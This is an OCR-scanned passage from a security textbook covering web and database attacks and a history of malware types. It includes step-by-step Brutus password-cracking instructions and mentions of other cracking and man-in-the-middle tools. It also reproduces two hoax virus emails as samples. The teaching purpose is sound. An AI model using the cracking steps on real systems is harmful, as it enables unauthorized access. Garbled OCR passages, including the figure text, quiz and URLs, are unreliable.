designed to uncover and crack passwords for Web applications and Web sites is a utility known as Brutus. Brutus is not a new tooi but it does demonstrate one weapon that the attacker has to uncover passwords for Web site and applications, Brutus is a password cracker that is designed to decode different password types present in Web applications. The utility is designed for use by the security professional for testing and evaluation purposes, but an attacker can use it as welL Brutus is as simple to use as are most tools in this category. The attack or cracking process using Brutus proceeds as follows: • Enter the IP address into the Target field in Brutus. This is the IP address of the server on which the password is intended to be broken. • Select the type of password crack to perform in the type field. • • Brutus has the ability to crack passwords in HTTP, FTP, POP3, and NetBus. » Enter the port over which to crack the password. • Configure the Authentication Options for the system. If the system does not require a username or uses only a password or PIN number, choose the Use User name option. • For known user names, the Single User option may be used and the username entered in the box below it. • Set the Pass Mode and Pass File options. • Brutus has the option to run the password crack against a dictionary word list. • At this point, the p as s wo rd-crac king process can begin; once Brutus has cracked the password, the Positive Authentication field will display it. Again Brutus is not the newest password cracker in this category, but it is well known and effective. Other crackers in this category include TllC Hydra. Scripting Errors Web applications, programs, and code such as Common G ate way Interface (CGI), ASP.NET. and JavaServer Pages (JSP) are commonly in use in Web applications and present their own issues. Using methods such as SQL injections and lack of input validation scripts can be a liability if not managed or created correctly. A savvy attacker can use a number of methods to cause grief to the administrator of a Web application, including the following: • Upload bombing — Upload bombing uploads masses of files to a server with the goal of filling up the hard drive on the server. Once the hard drive of the server is filled, the application will cease to function and crash. • Poison null byte attack — A poison null byte attack passes special characters that the scripts may not be designed to handle properly. When this is done, the script may grant access where it should not otherwise be given. • Default scripts — Default scripts are uploaded to servers by Web designers who do not know what they do at a fundamental level. In such cases, an attacker can analyze or exploit configuration issues with the scripts and gain unauthorized access to a system. CHAPTER 9 Web and Database Attacks • Sample scripts — Web applications may include sample content and scripts that are regularly left in place on servers. In such situations, these scripts, may be used by an attacker to carry out mischief. • Poorly written or questionable scripts — -Some scripts have appeared that include information such as user names and passwords potentially letting an attacker view the contents of the script and read these credentials. Session Management Issues A session represents the connection that a client has with the server application. The session information that is maintained between client and server is important and can give an attacker access to confidential information if compromised. Ideally a session will have a unique identilier, encryption, and other parameters assigned every time a new connection between client and server is created. After the session is exited, closed, or not needed, the information is discarded and not used again (or at least not used for an extended period of time), but this is not always the case. Some vulnerabilities of this type include: » Long-lived sessions — Sessions between client and server should remain valid only for the length they are needed and then discarded. Sessions that remain valid for periods longer than they are needed allow attackers using attacks such as XSS to retrieve session identifiers and reuse a session. • Logout features — Applications should provide a logout feature that allows a visitor to log out and close a session without closing the browser, Insecure or weak session identifiers — Session IDs that are easily predicted or guessed, so can be used by an attacker to retrieve or use sessions that should be closed. Some flaws in Web applications can lead to the reuse of session IDs. • Granting session IDs to unauthorized users — Sometimes applications grant session IDs to unaulhenticated users and redirect them to a logout page. This can give the attacker the ability to request valid URLs. Poor or lack of password change controls — An improperly implemented or insecure password change system h in which the old password is not required, allows a hacker to change passwords of other users. Inclusion of and unprotected information in cookies — Information such as the interna! IP address of a server that can be used by a hacker to ascertain more Eiboul the nature of the Web application. Encryption Weaknesses In Web applications, encryption plays a vital role because sensitive information is frequently exchanged between client and server In the form of logons or other types of information. 224 PART 2 A Technical Overview of Hacking When working on securing Web applications, you must consider the safety of infor- mation at two stages, when it is being stored and when it is transmitted. Both stages are potential areas for attack and must be considered thoroughly by the security profession aL When considering encryption Eind its impact on the application, the following are Eireas of concern: • Weak ciphers — Weak ciphers or encoding algorithms are those that use short keys or are poorly designed and implemented. Use of such weak ciphers can allow an attacker to decrypt data easily and gain unauthorized access to the information. • Vulnerable software — Some software implementations that encrypt the trans- mission of data, such as Secure Sockets Layer (SSL), may suffer from poor programming, and as such become vulnerable to attacks such as buffer overflows. • Some tools and resources are available that can help in assessing the security of Web applications and their associated encryption slralegies: • OpenSSL, an open source toolkit used to implement the SSLv 3 and TLS vJ protocols • h t tp.7 / ww w. op n i ssl org • The OWASP guide to common cryptographic flaws ■ h t fp.7 / ww w, owasp. o rgfasarJ cryptog raph id • K ess us security scanner that can list the ciphers in use by a Web server • httpifl ww w. nessus. o rg • WinSSLMiM can be used to perform n n II T TPS man-in- the- mid die attack. • h ftp .7 / ww iv. seCUri tv u i fa. com Jou tils/ WinSSLMiM . sh tm I • S tunnel, a program that allows the encryption of no n -SSL-aware protocols • h f tp.7 / ww w. stunueL org • Database Vulnerabilities One of the most attractive targets for an attacker is the database that contains the information about the site or application. Databases represent that “holy grail” to an attacker due to the information within in them: configuration information, application data, and other data of all shapes and sizes. An attacker that can locate a vulnerable database will find it a very tempting target to go pursue and may very well do so. The role of databases as the heart of a number of Web appli- cations is well known and very common. Databases lie at the heart of many well-known Web applications such as Microsoft’s SharePoint and other similar technologies. In fact, a majority of Web applications would not function without a database as their back end. NOTE Databases of any type can be vulnerable for any number of reasons no matter how secure or “unhackaible” the vendor espouses them to be. Vulnerabilities will vary depending on the particular technology and deployment that is In use, but in every case the vulnerabilities are there. CHAPTER 9 Web and Database Attacks 225 A Look at Databases Tor alt its power and complexities, a database can be boiled down into a very simple concept: It is a hierarchical, structured format for storing information for later retrieval modification, management, and other purposes. The types of information that can be stored within this format vary wildly* but the concept is still the same; storage and retrieval, In the datahase world databases are typically categorized based on how they store their data, these organizational types are • Relational database — With a relational datEiba.se. data can be organized and accessed in different ways as appropriate for the situation. For example, a data set containing all the customer orders in a can be grouped by the Zip code in which the transaction occur red, by the sale price, by the buyer’s company name, and so on. • Distributed database — A distributed database is designed to be dispersed or replicated between different locations across a network. • Object-oriented programming database — An object-oriented programming database is built around data -de lined object classes and subclasses. Within a database there are several structures designed to organize and structure infor- mation. Each structure allows the data to be easily managed, queried, and retrieved: • Record — Each record in a database represent a collection of related data such information about a person. Column — Represents one type of data, for example, age data for each person in the database. ■ Row — One line of data in a database. Iji order to work with the data in a database, a special language is used. Structure Qiutv LniiLiimiv iSOLj is a standard language for making interactive queries from and updating a database such as IBM DB2; Microsoft Access: and database products from Oracle, Sybase, and Computer Associates. Databases have a broad range of applications for everything from storing simple customer data to storing payment and customer information. For example, in an e -commerce appli- cation when customers place an order their payment and address information will be stored within a database that resides on a server. While the function of databases may sound mundane, databases really come into their own when linked into a Web application. A database linked as part of a Web application can make a Web site and its content much easier to maintain and manage. For example, if you use a technology such as ASRNET, NOTE SQL was developed by IBM in the early 1970s and has evolved considerably since then. In fact, SQL is the de facto language of databases and is used by systems such as Oracle, Siebel, Access^ and Microsoft SQL Server. * NOTE While the database changes from server to server and application to application, the actual concept is the same. The finer details of every database will not be discussed because thfs would be impossible,, but you can learn the broad details that will apply to just about every database. 226 P A RT 2 A Tech nical Overview of H ack i rig NOTE Of course^ the process of actually linking a database to a Web application or page is much more complex than detailed here, but the process Es essentially the same no matter the technology. you can modify a Web site’s content simply by editing a record in a database. With l his linkage, simply changing u record in a database will trigger a change in any associated pages or other areas. Another very common use of databases, and one of the higher- profile targets, is in membership or member registration sites. In these types of sites, information about visitors who register with the site is stored within a datEibcise. This can be used for a discussion Ibrum. ehrit room, or iminv other applications. With polentially large amounts of personal information being stored, an attacker w T ould find this setup ideal for obtaining valuable information. In essence, a database hosted on a Web server behaves as a database resident on a computer, it is used to store, organize, and transmit data. Vulnerabilities Databases can have a myriad of vulnerabilities that leave them susceptible to attack. These vulnerabilities are as varied as the environments the technologies are deployed into. Vulnerabilities include misconfiguration, lack of training, buffer overflows, forgotten options, and other details lurking in the wings waiting for an attacker. Before vou can uncover the vulnerabilities in databases it is u necessary to know what type and where your databases reside. Databases can be easily missed because they may be installed as part of another application or just not reported by the application owner. For example, a product manufactured by Microsoft known as SQL Server Express is a small, free piece of software that is part of various applications that a typical user may install. As such, this database may go unreported by users who are unaware of the security issues involved. NOTE Network and security administrators often lose track of (or just don’t know a boot) database servers on their network. While larger databases are more than likely to be on the administrator’s radar, smaller ones that get bundled in with other applications can easily be overlooked. Locating Databases on the Network A tool that is very effective at locating these “rogue” or unknown installations is a tool known as SQLPing 5.0. The description of this tool from the vendor’s Website describes the product: “SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support, SQL Server installations are becoming increasingly difficult to discover, assess, and maintain. SQLPing 5.0 is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret out servers you never knew existed on your network so you can properly secure them. M A sere en shot from SQLPing 3.0 is shown in Figure 9-2, CHAPTER 9 Web and Database Attacks 227 Scan f w« Dvt A^i<fj j F fc Mtpc ■ WHW.M^\nirily.iiini “J SWPAiHvH [:o« |1Q0 [iCO [m I- BognScon J J PtdiiWi.Tro i iwvtr* Found =1 1. ooi Dl Btve zoo. iqo. too. i?s iticiiH ui^v>u:i4 funtN:puiw»N 00:00:00 Scamuv? liutlKtO ” 00:04:00 <Ji«rU«. 00:00:00 led4 1 ur*ri 00.00.00 L&4d tl* p>iiwoi<li 00:0O:O0 hvnmg »V>ft : ZOO. 100, 100, 17* M 00:91 S«cv«r: ZOO. 1QO. 100. 171 Fcr’-liJi Va*rV 00-00-01 lew CwlKl ** FIGURE 3-2 SQL Ping 3.0 interface. A cousin of SQLFing is a product known eis SQLRecon. This product is very similar lo S-OLPing* hut also employs additional techniques to discover SQL Server in stall Eit ions that may be hidden: ‘SQLRecon performs both active and passive scans of your network in order to identify all of the SQL Server /MSDE instal- lations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support. SQL Server installations are becoming increasingly difficult lo discover, assess, and maintain, ■SQLRecon is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret-out servers you never knew existed on your network so you can properly secure them.” Running a scan with either of these tools will give you infor- mation about where you may have SQL Server installations that you are u mi ware of. | NOTE Don’t get caught in the trap of thinking that these tools should be run only to detect hidden servers when you suspect that they exist, You should consider periodically running these tools, or similar ones, as an audit mechanism to detect servers that may pop up from time to time. 228 PART 2 A Technical Overview of Hacking NOTE The tools discussed so far have been targeted toward SQL Server,, but other vendors have their databases on the market, too. If you need to crack passwords tn some of these other technologies, a good tool is Cain. This tool has the ability to crack passwords of databases such as those found in SQLServer, MySQL, and Oracle password hashes. Database Server Password Cracking After a database has been located, the next step an attacker can choose to take is to see whether the password can be broken. A feature that is included in SQLPing3 .0 is a password-cracking capability that can be used to target a database server and break its passwords. The password -cracking capabilities included with the product include the ability to use dictionary-based cracking methods to bust the passwords. Locating Vulnerabilities in Databases Every database is prone to its own types of vulnerabilities, but there are some common ones that can be exploited using the right tools. Some common vulnerabilities include: • Unused stored procedures • Services account privilege issues • Weak or poor authentication methods enabled • No [or limited) audit log settings • Having knowledge of the database that you are using can go a Jong way toward thwarting these problems, but other there are some other methods that can he used. One effective method for uncovering problems is to consider the security problem from both an insider and outsider’s perspective. Use tools and methods that an attacker that has no knowledge of the system might use. Two pieces of software that are useful for perform audits on databases are known as NGSSquirrel and App Detective, NGS Squirrel from NGS Software is a tool used to audit dattibcises to uncover vulner- abilities. In NGS Software’s own words from its Web site: “NGSSQuirreL for Oracle is our vulnerability assessment scanner that sets the standard. Developed with the help of the highly experi- enced NGSResearcb Team. It has been speciikally developed Ibr use with Oracle DtunhLise Servers, allowing system administrators and security professionals to expose potential vulnerabilities. More than simply a scanner, it provides the capability to audit password quality, rectify identified threats, and manage users and roles as well as system and object privileges.” NOTE NGS Software offers versions of this product for Oracle, SQL Server, DB2, Sybase, and Informix. The other software mentioned is AppDetective. In the vendor’s own words: “With a policy driven scanning engine, AppDetect i vePro identifies vulnerabilities and mis configurations. Issues identified include default or weak passwords, missing patches* poor access controls, and a host of other conditions. A flexible assessment framework allows auditors to choose between an outside -in, ‘hackers eye view h of the database which requires no credentials, or a more thorough inside-out scan which is facilitated through a read-only database account. CHAPTER 9 Web and Database Attacks AppDetectivePro includes built-in templates to satisfy the requirements of security best practices and various regulatory compliance initiatives. Compliance. 1 standards covered include DLSA STIC, NLST 800-53 (FISMA), PCIDSS, HIPAA, GLBA, Sarbanes-Oxley, LSO 2 700 1 , V.oim\ and Canada’s RUTS, Out of Sight, Out of Mind Protecting databases can be as simple as making sure their existence is not so obvious. Keeping a database hidden from casual and even some aggressive scans by attackers Is nol ;i ijil’licuh task ocean su L’lr tools art- quiu- often a l your linger Lips. !os1 Web servers, Web applications, and the databases hosted in the environment include some security features that can make a huge difference in protecting the database from would-be attackers: • Learn the provided security features in the database system — Protect the stability of the database and its surrounding applications by evaluating the use of what is known as process isolation. Process isolation provides extra protection against catastrophic failure of a system by ensuring that one process crashing will not take others with it. Evaluate the use of nonstandard ports — Some applications must run on standard ports such as 1433 for SQL Server. If your application does not require a specific port h consider ch tinging 31 do one that is not commonly looked for or is unusual, making an attacker have to do more work. Keep up to date — Keep on top of the patches and service packs that are made available for your system. Apply the patches where appropriate to ensure that you do not become a victim of a bug or defect that has already been addressed. • It’s as good as its foundation — The database doesn’t live on an island someplace by itself; it is installed on an operating system. Ensure that the operating system in use always has the latest patches and service packs installed. • Use a firewall — Don’t fling a database into the void; use a firewall to protect it. A good firewall can provide tremendous protection to a database server making sure that too much information is never exposed, 230 PART 2 A Technical Overview of Hacking SEE CHAPTER SUMMARY Today the public face of jusl about every organization is lis Web site, along with its Web application and the features they oiler. Companies tend to host a wide variety of content on the servers that their customers or potential customers will be interacting with. A Web site being the first point of contact for customers is also something that is an attractive target for an attacker With a well-placed attack, an individual with an ax to yrind can embarrass a company by defacing its Web site or stealing information. As a security professional, one of the tasks you are charged with is safeguarding this asset and the infrastructure that is attached to it. Defending a Web server requires special care and knowledge to make the information and content available, but at the same time protect it from unnecessary exposure to threats, This task is trickier than it sounds because a balance has to be struck between making the content accessible to the appropriate audience while at the same lime ensuring that il is secure. In addition, the Web server cannot be considered a standalone entity, because it will usually be attached to the organization’s own network, meaning that threats against the server can flow over into the company network as we Ik Making the situation more complex is the I act that Web servers may not only host regular Web pages but aiso Web applications and databases. More and more organizations are looking to Web services such as streaming video and Web applications such as SharePoint to make a more dynamic experience for their clients. More organizations are hosting content such as databases online lor a wide range of reasons. Each of these situations represents another detail that the security professional must address properly to make sure that the server and the organization are safe and secure. WJ KEY CONCEPTS AND TERMS Cross-site scripting (XSS) Ports Structured Query Language (SQL) CHAPTER 9 Web and Database Attacks CHAPTER 9 ASSESSMENT 1 . validation is a rt.-s.ij It of SQL Injections. A, True B, False 1. Web applications are used to . A, Allow dynamic content B, Stream video C Apply scripting D, Security controls 1, Which i)]” the following challenges can be solved by firewalls? A, Protection against buffer overflows II, Protection against scanning l”. 1-[]J(jj cement ol pm iicges \1 Ability to use nonstandard parts 4, Databases can be a victim of source code exploits. A. True B, False 1. The stability of a Web server does not depend on the operating system, A. True li, False 1. are scripting languages.. A. ActiveX B. Java C. ecu D. AS P. N ET 1. is used to audit databases, A, Ping B. IPConfig C NCSSqulrrcl S. Browsers do not display . A. ActiveX B. Hidden Holds C. Java L>, Javascript 1. can be caused by the exploitation o\ defects and code. A. Buffer overflows B. SQL Injection C. Buffer injection D. Input validation Malware, Worms, and Viruses NE OF THE PROBLEMS in the technology business that has grown U considerably over the years is the issue of malware. Malware in all its forms has moved from being one of a simple annoyance to one of downright maliciousness. Software in this category has evolved to the point of being dangerous, as it now can steal passwords, personal information, and plenty of other information from an unsuspecting user. Malware is nothing new, even though the term may be. The problem has existed for years under different names such as viruses, worms, adware, sea re ware, and spy ware. But is has become easier to spread because of the convenient distribution channel the Internet offers, as well as the increasingly clever social-engineering methods the creators of this type of software employ. Making the problem of malware even larger is the complexity of modern software, lack of security, known vulnerabilities, and users’ lax attitude toward security updates and patches. Malware or malicious code is not going to decline; in fact, the opposite is true. One type of malware, Trojans with keyloggers, saw an increase of roughly 250 percent between January 2004 and May 2006, and such a trend represents just one category. Some types of malware have seen even larger increases. It is with these points in mind that this chapter will examine the problem of malware, trends, and how to deal with the increasingly serious threat this type of software poses. Chapter 10 Topics This chapter covers the following topics and concepts: • What malware is • What viruses are and how they function • What worms are and how they function • 232 ■ What spyware is • What ad ware is • What scareware is • Chapter 10 Goals When you complete this chapter, you will be able to: • List the common types of malware found in the wild • Describe the threats posed by malware • Describe the characteristics of malware • Describe the threats posed by viruses • Identify the different characteristics of malware • Identify removal techniques and mitigation techniques for malware • Malware The lerm malware is often tossed around, but what exactly does it mean? Mat ware refers to software that performs any action or activity without the knowledge or consent of the system’s owner. But the definition of malware can he expanded to include any software that is inherently hostile, intrusive, or annoying in its operation. In the past, malware was designed to infect and disrupt, disable* or even destroy systems and applications. In some cases this disruption went one step further and used an infected system as a weapon to disable or disrupt other systems. In recent years the nature of malware has changed with the software seeking to remain out of sight in an effort to evade detection and removal by the system owner for as long as possible. All the while, the malware is resident on a system taking up resources and power for whatever purpose the attacking or infecting party may have in mind. In the present day malware has changed in nature dramatically with the criminal element realizing the advantages of using it for more malicious purposes. In the past it was not uncommon for malware to be written as a prank or to annoy the victim, ^ NOTE Mat ware is a contraction for the term malicious software, which gives a much more accurate picture of the goal of this class of software. [ NOTE If the definition of malware is limited to just software that perforins actions without the user’s knowledge or consent this could include a large amount of software on the average system. It is also important to classify as malware software that is hostile in nature, 233 234 PA RT 2 A Tech nical 0 vervie w of H ack i n g rC FY! Increasing amounts of ma I ware have shown up over the past decade with the goal of making some sort of financial gain for their creators. In the 1990s the idea of financial gain from such software started in the form of dialers that would use a computer’s modem to call up numbers such as adult services or other types to generate revenue. Over the last few years the tactics have changed, however, with ma I ware tracking a person’s actions all the way to targeting ads and other items on a victim’s system. but times have changed, Malware in the current day has been adopted by criminals for a wide array of purposes to capture information Eibout the victim or commit other acts. As technology hus c\ olved, so has ma I ware — from the annoying to the downright malicious. The term mahvare used to cover just viruses, worms, Trojans, and other similar software that performed no useful function or carried out malicious activities, Mai ware has evolved to include new forms, such as spy ware, ad ware p and scareware. Software that used to just dial up systems or be annoying now redirects browsers, targets search engine results, or even displays advertisements on a system. Another aspect of malware that has emerged is its use to steal information. Malware programs have been know r n to install what is known as a key logger on a system, The intention here is to capture keystrokes when entered with the intention of gathering information such as credit card numbers, bank account numbers, or other similar information. For example, malware has been used to steal information from those engaging in online gaming to obtain players’ game account information. -i ™ » Malware doesn’t necessarily hide from the user in every case; it depends on the intended purpose of the creator. In some cases, spyware creators have stated their intentions outright by presenting end user license agreements (EULAs) to the victim. Because most users never read EULAs and the document looks legitimate, they tend to install the software without realizing that the document may clear the attacker of responsibility. I II CHAPTER 10 Malware, Worms, and Viruses 235 Trie popular online game by Activision Blizzard known as World of Warcraft (WoW) has been a target of multiple keyloggers since its debut. The intention with most keyloggers that have targeted this game has been to capture what is known as an Authentication Code, used to authenticate user accounts. When a victim is infected, the code is intercepted when entered and a false code is sent to the WoW servers. The attackers get the real code at this point and can now log onto the account directly while the victim is left out in the cold. Malware’s Legality iMalware has tested and defined legal boundaries since Lt came into being. Lawmakers have passed statues specifically to deal with the problem. Mai ware initially was perceived as being harmless, relegated to the status of a prank. But times changed — a more serious look at the problem of malware became necessary. Over the past few years the problems malicious code poses have been addressed technologically. In addition, new legal remedies have emerged in several countries. In the United States several laws have been introduced since the 1980s. Some of the nit) re notable ones include: The Computer Fraud and Abuse Act 1986 — This law was originally passed to address federal computer-related offenses and the cracking of computer systems. The act applies to cases that involve federal interests, or situations involving federal government computers or those of financial institutions. Additionally the law covers computer crime that crosses stEite lines or jurisdictions. • The Patriot Act — This expanded on the powers already included in the Computer Fraud and Abuse Act. The law: • Provides penalties of up to 10 years for a iirst offense and 20 years for a second offense • A ssess es d a m ages over thee o u r se o f a yea r to muLli p] e s y ste m s to d e t e r m i n e if such damages are more than$5,000 total

• ( ™ h

In 2009 Canada enacted the Electronic Commerce Protection Act (ECPA) r which was designed
to meet the problem of malware head-on. The EC PA has several provisions for both spam and
malware designed to limit the proliferation of the software both inside and outside Canada.
The act introduces some steep fines of up to $10 million for an organization and$1 million
for an individual for those installing unauthorized software on a system.

236 PA RT 2 A Tech n i ca I Overview of H atk i n g

■ Increases punishment for any violation that involves systems that process
information relating to the justice system or military

fovers damage Lo foreign computers involved in US interstate commerce

• Includes, in calculating damages, the time and money spent investigating a crime
• Makes selling computer systems infected with malware a federal offense.

• Each country has approached the problem of malware a little differently, with penalties
ranging from jail time lo potentially steep tines Tor violators. In the United States, states
such as California, West Virginia, and ei host of others have put in place laws designed to
punish malware perpetrators. While the laws have different penalties designed to address
ma I ware’s effects, it has yet to be seen what the effects of these laws will be.

Types of Malware

While the term malware may refer to any software that fits the definition, it is also
important to understand the specifics and significance of each piece of software under
the malware banner A broad range of software types and categories exists, some of
which have been around for a long time. Malware includes the following:

• Viruses
• Worms

• Spy ware

• Scare ware

• Trojan horses

• Rootkits

• The latter two will be discussed in the next chapter

Mai ware’s Targets

A quick review of the targets of malware authors gives a good taste of why the problem

is so serious:

• Credit card data — Credit card data and personal information is a tempting and
all too common target Upon obtaining this information an attacker can go on a
shopping spree, purchasing any type of product or service: Web services, games,
merchandise, or other products.
• Passwords — Passwords are another attractive target for attackers. The compromise
of this sort of information can be devastating to the victim. Most individuals will
reuse passwords over and over again, and stealing a person’s password can easily
open many doors to the attacker. Stealing passwords can allow a hacker to read
passwords from a system that includes everything from e-mail and Internet accounts

• CHAPTER 10 Malware, Worms, and Viruses

237

Insider information — Confidential or insider information is another target for an
attacker. An attacker may very well use malware to gain such information from
an organization to gain a competitive or financial benefit.

Data storage — In some cases a system infected with malware may find itself a point
for storing data without the owners’ knowledge. Uploading data to an infected
system can turn that system into a server hosting tiny type of content. This has
included illegal music or movies, pirated software, pornography, financial data,
or even child pornography.

Viruses and How They Function

A virus is one of the oldest pieces of software that fits under the definition of malware.
It may also be one of the most frequently misunderstood. The term virus is frequently
used to refer to all types of malware.

Before getting too far into a discussion of viruses it is important to make clear first
what a virus actually is and the behaviors viruses exhibit. A virus is a piece of code
or software that spreads from system to system by attaching itself to other liles. When
the file is accessed, the virus is activated. Once activated, the code carries out whatever
attack or action the author wishes to execute, such as corrupting data or destroying
it outright.

Viruses have a long history, one that shows how this form of malware adapted and
evolved as technology and detective techniques improved. Let’s examine the “btick story”
of viruses, how they have changed with the times, and how this affects you as a security
professional.

Viruses: A History

As stated earlier, viruses are nothing new; the first viruses debuted
in the ” l wild H roughly 40 years ago as research projects. They have
evolved dramatically since then into the malicious weapons they
are today.

The first recognized virus was created as a proof-of-concept
application designed in 1971 to demonstrate what was known as
a mobile application. In practice the Creeper virus, as it was known,
spread from system to system by locating a new system while resident
on another. When a new system was found the virus would copy
11 sell and delete itself oft’ tin- i>ld one. Additionally Liu- Creeper drus
would print out a message on Lin in tee led machine that stated “Tin [he
Creeper, catch me if you can/ In practice the virus was harmless and
was not that advanced compared with modern examples.

NOTE

A second piece of code,
known as the Reaper;
was specifically designed
to remove the Creeper
from circulation.

NOTE

The term virus was not
coined until the 1980s,
so the negative term was
not applied to these early
examples.

238 PART 2 A Technical Overview of Hacking

NOTE

The ElkCloner virus was developed
by Rich Skrenta when he was all of
15 years old. He developed the virus
to have fun with friends who no
longer trusted floppies that he gave
them, He came up with the novel
concept of infecting floppies with
a memory-resident program.

In the mid- 1970s a new feature was introduced in the Wabbit virus.. The Wabbit virus
represented a change in t el c tics in that it demonstrated one of the features associated
with modern day viruses — replication. The virus replicated on the same computer over
and over again until the system was overrun and eventually crashed.

In 1982 the first virus seen outside academia debuted in
the form of the ElkC toner virus. This piece of ma [ware debuted
another feature of later viruses — the ability to spread rapidly
and re mil in in the computer’s memory to cause further
infection. Once resident in memory, it w T ould infect floppy disks
placed into the system Later, as many later viruses w T ould do.

Four short years later, the first PC-compatible virus
debuted. The viruses prior to this point were Apple II types
or designed Tor specific research networks. In 1986 the
first of what was known as boot sector viruses debuted ,
demonstrating a technique later seen on a much wider
scale. This type of virus infected the boot sector of a drive
and would spread its infection when the system was pjing
through its boot process.

The lirst of what would hiter be called logic bombs debuted
in 1987: the Jerusalem virus. This virus was designed to
cause damage only on a certain dale in ibis case. Friday
the nth. The virus was so named because of its initial
discovery in Jerusalem.

Mullipartite viruses made their appearance in 1989 in
the Chostball virus. This virus w T as designed to cause damage
using multiple methods and components, all of which had to
be neutralized and removed to clear out the virus effectively.
Polymorphic viruses first appeared in 1992 as a way to evade early virus-detection
techniques. Polymorphic viruses are designed to change their code and “‘shape” to avoid
detection by virus scanners, which w r ould look for a specific virus code and not the new
version.

Fa st- forward to 2008 and Mocmex, Mo cm ex was shipped on digital photo frames
manufactured in China. When the virus infected a system, its lirew r all and antivirus
software were disabled; then the virus w T ould attempt to steal online-game passwords.

Modern viruses and virus writers have gotten much more creative in their efforts
and in some cases are financed by criminal organizations to build their software.

NOTE

The first logic bomb most individuals
heard of was the Michelangelo virus,
designed to infect on the famous
painter’s birthday. In reality the
virus was a great non-event — it was
before it could cause any serious
damage.

Types of Viruses

So you can see that not all viruses are the same; there are several variations of viruses,
each of which is dangerous in its own way. Understanding each type of virus can give
you a better idea of how to tlrwart them and address the threats they pose,

CHAPTER 10 Malware, Worms, and Viruses

On October 29, 2003, a logic bomb was discovered at Fannie Mae, the Federal National
Mortgage Association, in the United States. The bomb was created and installed by Rajendrasinh
Makwana, an IT contractor who worked in Fannie Maes Urban a, Maryland, facility. As designed,
the bomb was to activate on January 31 r 2009. If successful, it would have wiped all of Fannie
Mae’s more than 4,000- servers.

Makwana, upset that he had been terminated, planted the bomb before his network access
was terminated. He was indicted in a Maryland court on January 27, 2009, for unauthorized
computer access.

Logic Bombs

A logic bomb is a piece of code or software designed to lie in wait on a system nntil
Ei specified event occurs. When the event occurs the bomb “goes off” and carries out
its destructive behavior as the creator intended. While the options are literally endless
as far as what a logic bomb can do, the common use of this type of device is to destroy
data or systems.

Logic bombs have been notoriously difficult to detect because of their very nature
of being “harmless” until they activate. Mai ware of this type is simply dormant until
whatever it is designed to look for happens. W hat can activate this software is known
as a positive or negative trigger event coded in by the creator, A positive trigger is a
mechanism that looks for an event to occur such as a date. A negative trigger, on the
other hand, is designed to monitor an action; when such action does not occur it goes off.
An example would be if a user does not log on for some period. This process of “hiding ”
until an event occurs or does not occur makes this particular type of malware dangerous.

As a security professional you will have to be extra vigilant to detect logic bombs before
they do damage. Traditionally the two most likely ways to detect this type of device are
by accident or after the fact. In the lirsl method, an IT worker just happens to stumble
upon the device by sheer “dumb luck” and deactivates the bomb. In the second method,
the device “detonates” and then the cleanup begins. The best detection and prevention
methods are to be vigilant, to limit access of employees to only what is necessary, and
to restrict access where possible.

Polymorphic Viruses

The polymorphic virus is unique because of its ability to change its “shape” to evade
antivirus programs and therefore detection. In practice this type of malware possesses
code that allows it to hide and mutate itself in random ways that prevent detection.
This technique debuted in the late 1980s as a method to avoid the detection techniques
of the time.

240 PART 2 A Technical Overview of Hacking

Polymorphic viruses employ a series of techniques to change or mutate, these
methods include:

Polymorphic engines — Designed to alter or mutate the device’s design while
keeping the pay load, the part that does the damage, intact

Encryption — Used to scramble or hide the damaging payload. keeping antivirus
engines from detecting it

When in action, polymorphic viruses rewrite or change themselves upon every execution.
The extent of the change is determined by the creator of the virus and can include simple
rewrite to changes in encryption routines or alteration of code.

Modern antivirus software is much better equipped to deal with the problems
polymorphic viruses pose. Techniques to detect these types of viruses include decryption
of the virus and statistical analysis and heuristics designed to reveal the software’s
behavior.

Multipartite Viruses

The term multipartite refers to a virus that infects using multiple attack vectors, including
the boot sector and executable files on the hard drive. What makes these types of viruses
dangerous and powerful weapons is that to stop them h you must totally remove all their
parts. If any part of the virus is not eradicated from the infected system, it can re-infect
the system.

Multipartite viruses represent a problem because they can reside in different locations
and carry out different activities. This class of virus has two parts, a boot in fee tor and
a file infeetor. If the boot in fee tor Is removed the file in fee tor will re -infect the computer.
Conversely, if the file infeetor is removed the boot sector will re-infect the computer.

Macro viruses are a class of virus that infects and operates through
the use of a macro language. A macro language is a programming
language built into applications such as Microsoft Office in the form
of Visual Basic for Applications I’VBA), It is designed to automate
repetitive tasks. Macro viruses have been very effective because users
have lacked the protection or knowledge to counteract them.

Macro viruses can be implemented in different ways, usually by
being embedded into a file or spread via e-mail. The initial infections
spread quite quickly because earlier applicEitions would run the macro
when a file was opened or when an e-mail was viewed. Since the debut
of these viruses, most modern applications disable the macro feature
or Eisk users whether they want to run macros.

Macro Viruses

MOTE

After the initial outbreaks
of macro viruses, Microsoft
introduced the ability to
disable macros. In Office
2010 macros are disabled
by default.

CHAPTER 10 Malware, Worms, and Viruses

Hoaxes

A hoax is not a true virus. But no discussion of viruses is complete without mentioning
the hoax virus. Hoax viruses are those designed to make the user take action even though
no infect ion or threat exists. The following example is an e-mail that actually is a hoax

H

virus,

PLEASE FORWARD THIS WARNING AMONG I RlliNDS, FAMILY AND CONTACTS:
You should be alert during the next days: Do not open any message with an attached
iiled called “Invitation” regardless of who sent it. It is a virus that opens an Olympic
Torch which “burns” the whole hard disc C of your computer. This virus will be
why you should send this e-mail to all your contacts. It is belter to receive this message
2 5 times than to receive the virus and open it. If you receive a mail called “Invitation,”
though sent by a friend, do not open it and shut down your computer immediately.
This is the worst virus announced by CNN; it has been classified by Microsoft as the
most destructive virus ever. This virus was discovered by McAfee yesterday, and there
is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the
Hard Disc, where the vital information is kept. SEND THIS E-MAIL TO EVERYONE
YOU KNOW, COPY THIS E-MAIL AND SEND IT TO YOUR FRIENDS AND REMEMBER:
IF YOIJ SEND IT TO THEM, YOU WILL BENEFIT ALL OF OS.

1 1 ere ‘s a n ot h er e jc a m pie:

AIL

There’s a new virus which was found recently which will erase the whole C drive.
If you get a mail with the subject “Economic Slow Down in US” please delete that mail
right away. Otherwise it will erase the whole C drive. As soon as you open it. it says<
11 Your system will restart now … Do you want to continue?”. Even if you click on NO.
your system will be shut down and will never boot again. It already caused major
damage in the US and few other parts of the world. The remedy for this has not yet
been discovered.

